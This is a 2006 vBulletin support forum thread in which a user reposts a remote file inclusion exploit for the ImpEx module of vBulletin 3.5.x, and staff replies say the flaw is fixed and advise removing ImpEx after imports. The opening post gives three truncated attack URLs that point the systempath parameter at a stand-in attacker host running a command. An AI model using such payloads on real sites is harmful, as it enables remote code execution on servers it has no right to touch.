Login or Sign Up
- Logging in...
  
  Remember me
  
  Forgot password or user name?
  
  or Sign Up
- Log in with Facebook Sign-in with Twitter

Search in titles only Search in vBulletin Pre-sales Questions only

Advanced Search

Forums
Articles
Blogs
Groups
Tracker
Purchase

Trending Topics
Member List
Calendar

Forum
vBulletin Sales and Feedback
vBulletin Pre-sales Questions

Welcome to the vBulletin support forums! In our community forums you can receive professional support and assistance with any issues you might have with your vBulletin Products.

Useful Links for Guests:
If you are having problems posting in the relevant areas for your software, please see this topic.

Announcement

Collapse

No announcement yet.

3.5.4 vBulletin Exploit

Collapse

X

Collapse

Posts
Latest Activity
Photos

Page of 1
Filter

Time

All Time Today Last Week Last Month
Show

All Discussions only Photos only Videos only Links only Polls only Events only

Filtered by:

new posts

Previous template Next

Jerry replied

Thu 25 May '06, 12:19pm
Indeed, this was fixed a while ago, and to clarify its was an issue with ImpEx not vBulletin itself.

ImpEx should always be removed after an import is successful.
Leave a comment:
Boxy replied

Thu 25 May '06, 8:33am
This was fixed a little while back.
Leave a comment:
NEWLiNE started a topic 3.5.4 vBulletin Exploit

Thu 25 May '06, 6:12am
3.5.4 vBulletin Exploit

I came across this on the internet...

Remote File Inclusion in VBulletin

version :

VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug reside in :

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit :

(1)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id

(2)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id

(3)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
Tags: None

Previous template Next

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.

(vbulletin-web1.internetbrands.com)

vBulletin Default Theme
English (US)

Help
Member's Area
Documentation
Submit Ticket
Privacy Policy
Forum Rules
Contact Us
Go to top

Do Not Sell My Personal Information

Powered by vBulletin® Version 5.6.4
Copyright © 2021 MH Sub I, LLC dba vBulletin. All rights reserved.

All times are GMT-8. This page was generated at 10:37pm.

Working...

X